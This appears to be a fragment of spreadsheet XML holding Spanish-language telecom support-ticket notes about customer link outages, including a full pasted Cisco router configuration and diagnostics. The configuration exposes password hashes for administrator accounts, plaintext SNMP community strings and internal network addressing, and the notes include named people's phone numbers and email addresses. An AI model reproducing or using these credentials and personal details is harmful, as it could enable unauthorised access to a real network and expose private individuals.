    <t>SE LLAMA AL CL CARLOS GODINEZ AL 22070800 EXT 0000 ID 2001523845 PERO NO ES CORRECTA LA EXT / SE LLAMA AL NUMERO DIRECTO 22070800 ID  2001524053 ATIENDE JOSE Y EL CONTACTA A ESTUARDO SE LE BRINDA LA INFORMACIÓN QUE REQUIERE QUE SE LE BRINDE LA LAN POR TAL RAZÓN SE CONTACTA CON EL GESTOR A CARGO LUVY.SANDOVAL AL 8126 ID 2001525225 INGRESA LA LLAMADA CON YENSI CALGUA NO RESPONDE DERIVA LA LLAMADA CON WAGNER POLANCO QUIEN ATIENDE Y SE LE BRINDA LA INFORMACIÓN Y SE DEJA CON EL CL EN LINEA, A LA ESPERA DE LOS AVANCES.</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTARA COMPARTIENDO DATOS PARA VISITA, POR LO QUE SE QUEDA A ESPERA DE ESTOS VIA CORREO
DE: CARLOS EDUARDO GODINEZ GONZALEZ &lt;CARLOS.GODINEZ@SOPESATOTAL.COM&gt;
ENVIADO: VIERNES, 10 DE JUNIO DE 2022 10:59
PARA: GUSTAVO ADOLFO BARAHONA PUTUL &lt;GUSTAVO.BARAHONA@CLARO.COM.GT&gt;; KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; LUIS MIGUEL IXCOT MORALES &lt;LUIS.IXCOT@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: RECUPERACIÓN GESTION SERVICIO ID 288700011T || CENTRAL AMERICANA DE DISTRIBUICION S.A.
BUEN DÍA,
CON GUSTO ESTOY COMPARTIENDO POR ESTA VÍA  DÍA Y HORA PARA VISITA.
SALUDOS,</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CARLOS GODINEZ AL 22070800 EXT 0000 NO RESPONDE || SE INTENTARA LUEGO YA QUE AUN NO RESPONDE CORREO CON INFORMACION**
ID 2001355175
**</t>
  </si>
  <si>
    <t>F4596068</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE FRANKLIN NOVOA 50489427076 NO RESPONDE ENVIA A BUZON || SE INTENTARA LUEGO **
ID 2001356183
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 25570026 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001361789</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIA MEDINA 89714419 MENCIONA QUE NO SE ENCUENTRA EN PR POR LO QUE SOLICITA LLAMAR A 25570026
-ID 2001360926</t>
  </si>
  <si>
    <t>F4596073</t>
  </si>
  <si>
    <t xml:space="preserve">
SE TERMINA EL MONITOREO SOLICITADO POR EL CLIENTE SE PORCEDE CON CIERRE DE TICKET
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 9 HOR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TERNIUM_GT_KM161_MAZATENANGO UPTIME IS 9 HOURS, 46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75136K/49152K BYTES OF MEMORY.
PROCESSOR BOARD ID FJC2107L0K7
2 GIGABIT ETHERNET INTERFACES
1 TERMINAL LINE
DRAM CONFIGURATION IS 64 BITS WIDE WITH PARITY DISABLED.
255K BYTES OF NON-VOLATILE CONFIGURATION MEMORY.
245744K BYTES OF USB FLASH USBFLASH0 (READ/WRITE)
LICENSE INFO:
LICENSE UDI:
-------------------------------------------------
DEVICE#	  PID			SN
-------------------------------------------------
*1  	  CISCO1921/K9          FJC2107L0K7
TECHNOLOGY PACKAGE LICENSE INFORMATION FOR MODULE:'C1900'
------------------------------------------------------------------------
TECHNOLOGY    TECHNOLOGY-PACKAGE                  TECHNOLOGY-PACKAGE
              CURRENT              TYPE           NEXT REBOOT
------------------------------------------------------------------------
IPBASE        IPBASEK9             PERMANENT      IPBASEK9
SECURITY      NONE                 NONE           NONE
DATA          NONE                 NONE           NONE
NTWKESS       NONE                 NONE           NONE
CONFIGURATION REGISTER IS 0X2102
CC_TERNIUM_GT_KM161_MAZATENANGO#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 3111 BYTES
!
VERSION 15.4
SERVICE CONFIG
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_TERNIUM_GT_KM161_MAZATENANGO
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$MMIC$BAVUQF3SPC.P3B5CAF.3U.
!
NO AAA NEW-MODEL
MEMORY-SIZE IOMEM 10
!
!
!
!
!
!
!
!
!
!
!
!
!
!
IP CEF
NO IPV6 CEF
MULTILINK BUNDLE-NAME AUTHENTICATED
!
CTS LOGGING VERBOSE
!
!
LICENSE UDI PID CISCO1921/K9 SN FJC2107L0K7
!
!
USERNAME GESTIONIP PRIVILEGE 15 SECRET 5 $1$AN6H$9JRB/AO0K02BM/1LU1V9P1
USERNAME ADMIN PRIVILEGE 15 SECRET 5 $1$XCNU$06M3SRMDY.2WLSYDAAZDP1
!
REDUNDANCY
!
!
!
CLASS-MAP MATCH-ALL SERVICIOS_1MB
 MATCH ANY
!
POLICY-MAP SERVICIOS_1MB
 CLASS SERVICIOS_1MB
  POLICE CIR 1024000 BC 192000 BE 384000
   CONFORM-ACTION TRANSMIT
   EXCEED-ACTION DROP
   VIOLATE-ACTION DROP
!
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO DEL CNOC
 IP ADDRESS 10.212.181.57 255.255.255.255
!
INTERFACE TUNNEL101
 DESCRIPTION TUNNEL GRE A VILLA NUEVA
 BANDWIDTH 1000
 IP ADDRESS 172.255.255.6 255.255.255.252
 TUNNEL SOURCE GIGABITETHERNET0/0
 TUNNEL DESTINATION 10.13.114.39
!
INTERFACE EMBEDDED-SERVICE-ENGINE0/0
 DESCRIPTION INTERFACE ACTUALMENTE NO ESTA EN USO
 NO IP ADDRESS
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/0
 DESCRIPTION WAN PRINCIPAL/_/837600003T/_/
 BANDWIDTH 1024
 IP ADDRESS 10.103.82.124 255.255.255.248
 LOAD-INTERVAL 30
 DUPLEX AUTO
 SPEED 100
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION LAN DEL CLIENTE
 BANDWIDTH 1024
 IP ADDRESS 10.199.23.2 255.255.255.0
 IP HELPER-ADDRESS 10.199.21.161
 IP HELPER-ADDRESS 10.190.2.62
 STANDBY 1 IP 10.199.23.1
 STANDBY 1 PRIORITY 120
 STANDBY 1 PREEMPT
 DUPLEX AUTO
 SPEED AUTO
 SERVICE-POLICY INPUT SERVICIOS_1MB
 SERVICE-POLICY OUTPUT SERVICIOS_1MB
!
!
ROUTER EIGRP 1
 DISTRIBUTE-LIST FILTRO_MAZATE_OUT OUT TUNNEL101
 NETWORK 10.199.23.2 0.0.0.0
 NETWORK 172.255.255.6 0.0.0.0
 PASSIVE-INTERFACE DEFAULT
 NO PASSIVE-INTERFACE TUNNEL101
 NO PASSIVE-INTERFACE GIGABITETHERNET0/1
!
IP FORWARD-PROTOCOL ND
!
NO IP HTTP SERVER
NO IP HTTP SECURE-SERVER
!
IP ROUTE 0.0.0.0 0.0.0.0 10.199.23.4 180
IP ROUTE 10.13.114.39 255.255.255.255 10.103.82.121
IP ROUTE 190.148.15.192 255.255.255.240 10.103.82.121
!
IP ACCESS-LIST STANDARD FILTRO_MAZATE_OUT
 REMARK REDES MAZATENANGO
 PERMIT 10.199.23.0 0.0.0.255
!
LOGGING SOURCE-INTERFACE LOOPBACK5
!
!
SNMP-SERVER COMMUNITY NM15SNMPRO RO 88
SNMP-SERVER COMMUNITY WAZZU RO
SNMP-SERVER COMMUNITY WAZZU RO
SNMP-SERVER TRAP-SOURCE LOOPBACK5
SNMP-SERVER LOCATION KM. 161 SALIDA A CUYOTENANGO, MAZATENANGO, SUCHITEPIQUEZ 14032'4.54"N 91031'23.28"O
ACCESS-LIST 88 REMARK MONITOREO DE CLARO
ACCESS-LIST 88 PERMIT 10.255.24.144 0.0.0.7
ACCESS-LIST 88 PERMIT 190.148.15.192 0.0.0.15
!
CONTROL-PLANE
!
!
!
LINE CON 0
 LOGGING SYNCHRONOUS
 LOGIN LOCAL
LINE AUX 0
LINE 2
 NO ACTIVATION-CHARACTER
 NO EXEC
 TRANSPORT PREFERRED NONE
 TRANSPORT OUTPUT PAD TELNET RLOGIN LAPB-TA MOP UDPTN V120 SSH
 STOPBITS 1
LINE VTY 0 4
 LOGIN LOCAL
 TRANSPORT INPUT ALL
!
SCHEDULER ALLOCATE 20000 1000
NTP SERVER PNPNTPSERVER.TERNIUM.TECHINT.NET
!
END
CC_TERNIUM_GT_KM161_MAZATENANGO#
LOG DEL ROUTER CPE:
SHOW LOG
SYSLOG LOGGING: ENABLED (0 MESSAGES DROPPED, 2 MESSAGES RATE-LIMITED, 0 FLUSHES, 0 OVERRUNS, XML DISABLED, FILTERING DISABLED)
NO ACTIVE MESSAGE DISCRIMINATOR.
NO INACTIVE MESSAGE DISCRIMINATOR.
    CONSOLE LOGGING: LEVEL DEBUGGING, 267 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    MONITOR LOGGING: LEVEL DEBUGGING, 0 MESSAGES LOGGED, XML DISABLED,
                     FILTERING DISABLED
    BUFFER LOGGING:  LEVEL DEBUGGING, 267 MESSAGES LOGGED, XML DISABLED,
                    FILTERING DISABLED
    EXCEPTION LOGGING: SIZE (4096 BYTES)
    COUNT AND TIMESTAMP LOGGING MESSAGES: DISABLED
    PERSISTENT LOGGING: DISABLED
NO ACTIVE FILTER MODULES.
    TRAP LOGGING: LEVEL INFORMATIONAL, 270 MESSAGE LINES LOGGED
        LOGGING SOURCE-INTERFACE:       VRF NAME:
        LOOPBACK5
LOG BUFFER (8192 BYTES):
5.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 05:53:13.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:02:35.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:03:13.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 06:03:51.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 06:04:29.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:13:51.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:14:29.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 06:15:07.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 06:15:45.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:25:07.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:25:45.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 06:26:23.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 06:27:01.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:36:23.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:37:01.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 06:37:39.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 06:38:17.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:47:39.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:48:17.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 06:48:55.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 06:49:33.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 06:58:55.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 06:59:33.022 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:00:11.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:00:49.654 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 07:10:11.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 07:10:49.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:11:27.653 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:12:05.653 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 07:21:27.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 07:22:05.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:22:43.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:23:21.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 07:32:43.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 07:33:21.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:33:59.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:34:37.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 07:43:59.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 07:44:37.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:45:15.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:45:53.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 07:55:15.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 07:55:53.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 07:56:31.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 07:57:09.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 08:06:31.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 08:07:09.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 08:07:47.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 08:08:25.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 08:17:47.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 08:18:25.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 08:19:03.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 08:19:41.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 08:29:03.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 08:29:41.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 08:30:19.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 08:30:57.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
*JUN 10 08:40:19.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/NETWORK-CONFG) FAILED
*JUN 10 08:40:57.021 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CISCONET.CFG) FAILED
*JUN 10 08:41:35.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNIUM_GT_KM161_MAZATENANGO-CONFG) FAILED
*JUN 10 08:42:13.677 UTC: %SYS-4-CONFIG_RESOLVE_FAILURE: SYSTEM CONFIG PARSE FROM (TFTP://255.255.255.255/CC_TERNI.CFG) FAILED
CC_TERNIUM_GT_KM161_MAZATENANGO#
SHOW CLOCK
*08:44:26.913 UTC FRI JUN 10 2022
CC_TERNIUM_GT_KM161_MAZATENANGO#
TABLA ARP DEL ROUTER CPE:
SHOW ARP
PROTOCOL  ADDRESS          AGE (MIN)  HARDWARE ADDR   TYPE   INTERFACE
INTERNET  10.103.82.121           9   A4BE.2BE5.7F1F  ARPA   GIGABITETHERNET0/0
INTERNET  10.103.82.124           -   286F.7F61.C020  ARPA   GIGABITETHERNET0/0
INTERNET  10.199.23.1             -   0000.0C07.AC01  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.2             -   286F.7F61.C021  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.4            58   0015.625F.DEAD  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.5            67   701F.5333.F540  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.35            0   1868.CBA6.C619  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.70            0   00CC.FC16.8F8B  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.71            0   5006.AB70.BEF8  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.72            6   00CC.FC16.8DC9  ARPA   GIGABITETHERNET0/1
INTERNET  10.199.23.73            0   98E7.F4BB.ABDE  ARPA   GIGABITETHERNET0/1
CC_TERNIUM_GT_KM161_MAZATENANGO#
INTERFACES DEL ROUTER:
SHOW INTERFACES DESCRIPTION
INTERFACE                      STATUS         PROTOCOL DESCRIPTION
EM0/0                          ADMIN DOWN     DOWN     INTERFACE ACTUALMENTE NO ESTA EN USO
GI0/0                          UP             UP       WAN PRINCIPAL/_/837600003T/_/
GI0/1                          UP             UP       LAN DEL CLIENTE
LO5                            UP             UP       MONITOREO DEL CNOC
TU101                          UP             UP       TUNNEL GRE A VILLA NUEVA
CC_TERNIUM_GT_KM161_MAZATENANGO#
SHOW IP INT BRIEF
INTERFACE                  IP-ADDRESS      OK? METHOD STATUS                PROTOCOL
EMBEDDED-SERVICE-ENGINE0/0 UNASSIGNED      YES NVRAM  ADMINISTRATIVELY DOWN DOWN
GIGABITETHERNET0/0         10.103.82.124   YES NVRAM  UP                    UP
GIGABITETHERNET0/1         10.199.23.2     YES NVRAM  UP                    UP
LOOPBACK5                  10.212.181.57   YES NVRAM  UP                    UP
TUNNEL101                  172.255.255.6   YES NVRAM  UP                    UP
CC_TERNIUM_GT_KM161_MAZATENANGO#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TERNIUM 10.103.82.124
  PING 10.103.82.124: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.103.82.124 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.33
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TERNIUM 10.103.82.124
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TERNIUM
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.103.82.124/32  DIRECT  0    0                 0.0.0.0         VLANIF543			</t>
  </si>
  <si>
    <t>SE LLAMÓ A PR 30224426 PARA SEGUIMIENTO, NO CONTESTA; CENTRAL 00 52 81 8865 2828 TAMPOCO LO HACE, LLAMAR MAÑANA A LAS 08:00AM; ADICIONAL SE PIDE APOYO VÍA CORREO:
ASUNTO: RE: CAÍDA DE ENLACE CA_CLARO_MAZATENANGO REF. 837600003</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, A LA ESPERA DE RESPUESTA.
RE: CAÍDA DE ENLACE CA_CLARO_MAZATENANGO REF. 837600003</t>
  </si>
  <si>
    <t>CLIENTE SIGUE SIN RESPONDER, ID: 2001307280.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. OLIVER CUX 30224426 NO CONTETO IVR ENVIA A BUZON, ID: 2001306764.</t>
  </si>
  <si>
    <t>F4596078</t>
  </si>
  <si>
    <t>CORREO ENVIADO A LA ESPERA DE CONFIRMACION
TIC-TELECOM@BANRURAL.COM.GT
BUEN DÍA
ESTIMADO CLIENTE, POR ESTE MEDIO SOLICITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS   PARA PERSONAL TÉCNICO CON RESPECTO AL ENLACE CON 8902214T  BANCO DE DESARROLLO  ADJUNTO DATOS DE PERSONAL TÉCNICO QUE SE ESTAN TRASLADANDO A SUS INSTALACIONES.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O A LA ESPERA DE SUS COMENTARIOS
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>1/4	ALEJANDRO URIZAR	58265358	30 MIN
SE  NOTIFICA DE SOLICITUD</t>
  </si>
  <si>
    <t>TIEMPOS ACUMULADOS
4/4	RODOLFO MORALES	58261609	8 HORAS	8:07:00</t>
  </si>
  <si>
    <t>TECNICO INDICA QUE ESTE EQUIPO NO EXISTE EN NODO
GSJSGTSJN2D1B02A09F8M4 10.31.233.16
LRS USAN UN ESPEJO DEL 1 NIVEL HACIA EL 3ER NIVEL PAR CONEXION LRS</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A INGENIERIA
8902214T</t>
  </si>
  <si>
    <t>SE REALIZAN PRUEBAS CON TECNICO SIN TENER RESPUESTA POSITIVA SE QUEDA TRABADO USUARIO EN LRS Y NO SE PUEDE GESTIONAR CAMBIOS EN REPISA</t>
  </si>
  <si>
    <t>SE PLATICA CON TECNCIO PARA QUE SE LEVANTE MAQUETA EN NODO Y REALIZAR PRUEBAS DE CONEXION</t>
  </si>
  <si>
    <t>F4596078 ES NECESARIO QUE SE SIGA LA RUTA PARA PODER VALIDAR L2 YA QUE AYER SE TUVO MASIVA Y SOLO ESTE SERVICIO NO LEVANTA, DYLAN HACE REVISION DE LRS Y NO SE VE CONEXION DESDE TARJETA HACIA CPE</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A CNOC CLARO VÍA SKYPE, VALIDANDO CRONO MÁS RECIENTE EN FALLA.</t>
  </si>
  <si>
    <t>SE RESPONDE
8900289		6 AVENIDA 6-09 ZONA 1 SAN JUAN SACATEPEQUEZ</t>
  </si>
  <si>
    <t>F4596080</t>
  </si>
  <si>
    <t>FAVOR BRINDAR UNA NUEVA RED PUBLICA PARA REAILZAR PRUEBAS EN FORTINET SEGUN CRONO SOC</t>
  </si>
  <si>
    <t>&lt;JTPAGTJUN1C1A04A02EIM1&gt;PING -C 1500 -M 30 -B -VPN INTERNET_GT_DEPTAL 186.151.15.17
  PING 186.151.15.17: 56  DATA BYTES, PRESS CTRL_C TO BREAK
